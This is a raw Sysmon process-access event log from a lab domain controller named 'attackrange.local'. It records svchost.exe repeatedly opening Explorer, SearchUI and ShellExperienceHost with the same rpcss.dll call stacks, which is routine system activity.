17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061064Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061063Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061062Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061061Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061060Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061059Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061058Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061057Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061056Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061055Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.356{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061054Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.356{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061053Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.356{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061052Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.356{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061051Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.356{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061050Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.356{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061049Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.356{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061048Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.356{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061047Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.356{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061046Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.356{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061045Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.356{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061044Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.356{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061043Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.356{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061042Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.356{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061041Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.356{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061040Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.356{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061039Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.356{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061038Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.356{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061037Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.356{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061036Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.355{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061035Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.355{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061034Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.355{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061033Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 